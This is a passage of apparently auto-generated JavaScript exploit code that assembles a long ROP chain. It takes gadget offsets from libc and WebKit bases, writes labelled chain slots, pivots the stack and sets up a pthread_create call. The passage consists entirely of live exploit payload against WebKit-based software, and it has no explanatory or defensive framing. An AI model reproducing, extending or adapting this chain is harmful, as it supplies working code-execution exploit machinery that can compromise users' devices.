ropchain+154624, //L2240
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+154592, //L2238
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+154608, //L2239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2238:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2239:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2240:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+154704, //L2241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2241:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2243:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+154824, //L2246
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+154808, //L2244
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2244:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2246:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+154968, //L2249
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+154936, //L2247
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+154952, //L2248
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2247:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2248:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2249:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+155040, //L2251
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2251:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+155096, //L2252
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2252:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+155176, //L2254
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2254:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2256:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+155296, //L2259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+155280, //L2257
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2257:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2259:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+155472, //L2262
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+155488, //L2263
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+155440, //L2260
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+155456, //L2261
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2260:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2261:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2262:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2263:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+155600, //L2264
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+155632, //L2266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+155616, //L2265
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2264:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2265:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2266:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+155720, //L2268
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2268:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+155776, //L2269
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2269:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+155872, //L2272
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2272:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+155928, //L2273
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2273:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2275:
db([16, 0]); // 0x10
set_gadget(libc_base+763368,); //pop rcx
//L2276:
db([16, 0]); // 0x10
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+156080, //L2278
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2278:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+156136, //L2279
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2279:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+156240, //L2281
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2281:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2283:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+156360, //L2286
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+156344, //L2284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2284:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2286:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+156504, //L2289
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+156472, //L2287
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+156488, //L2288
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2287:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2288:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2289:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+156584, //L2290
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2290:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2292:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+156704, //L2295
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+156688, //L2293
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2293:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2295:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+156848, //L2298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+156816, //L2296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+156832, //L2297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2296:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2297:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2298:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L2300:
ropchain+156952, //L2299
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+86896, //_create_extcall
//L2299:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+157024, //L2301
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2301:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2303:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+157144, //L2306
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+157128, //L2304
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2304:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2306:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+157288, //L2309
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+157256, //L2307
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+157272, //L2308
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2307:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2308:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2309:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L2310:
jop_frame_addr,
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+157416, //L2311
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2311:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2313:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+157536, //L2316
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+157520, //L2314
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2314:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2316:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+157680, //L2319
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+157648, //L2317
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+157664, //L2318
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2317:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2318:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2319:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+157760, //L2320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2320:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2322:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+157880, //L2325
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+157864, //L2323
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2323:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2325:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+158024, //L2328
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+157992, //L2326
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+158008, //L2327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2326:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2327:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2328:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L2330:
ropchain+158128, //L2329
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+159008, //L2331
//L2329:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+158272, //L2333
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+158288, //L2334
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+158256, //L2332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2332:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2333:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2334:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+158400, //L2335
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+158432, //L2337
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+158416, //L2336
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2335:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2336:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2337:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+158536, //L2338
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+158552, //L2339
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2338:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2339:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+158672, //L2340
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+158656, //L2341
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2341:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2340:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+158760, //L2343
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+158744, //L2342
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2342:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2343:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+158864, //L2344
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+158880, //L2345
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2344:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2345:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+159000, //L2346
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+158984, //L2347
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2347:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2346:
db([0, 0]); // 0x0
//L2331:
set_gadget(libc_base+764760,); //pop rsi
db([208, 0]); // 0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+144605, //pop rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+764760, //pop rsi
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+1438842, //pop rdx
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+763368, //pop rcx
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+568675, //pop r8
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+3236123, //pop r9
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+756281, //xor rax, rax
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+11, //nop
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+11, //nop
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+764760, //pop rsi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+763368, //pop rcx
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+144605, //pop rdi
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+568675, //pop r8
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+782311, //pop rsp
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([208, 0]); // 0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967080, 4294967295]); // -0xd8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([200, 0]); // 0xc8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967088, 4294967295]); // -0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([192, 0]); // 0xc0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967096, 4294967295]); // -0xc8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([184, 0]); // 0xb8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967104, 4294967295]); // -0xc0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([176, 0]); // 0xb0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967112, 4294967295]); // -0xb8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([168, 0]); // 0xa8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
webkit_base+14664103, //and rax, rcx
libc_base+763368, //pop rcx
pthread_create_addr,
webkit_base+20307877, //mov [rax], rcx
libc_base+764760 //pop rsi
]);
db([4294967192, 4294967295]); // -0x68
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760 //pop rsi
]);
db([48, 0]); // 0x30
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([32, 0]); // 0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760 //pop rsi
]);
db([24, 0]); // 0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([128, 0]); // 0x80
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+160328, //L2348
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+782311 //pop rsp
]);
//L2348:
db([0, 0]); // 0x0
//L2121:
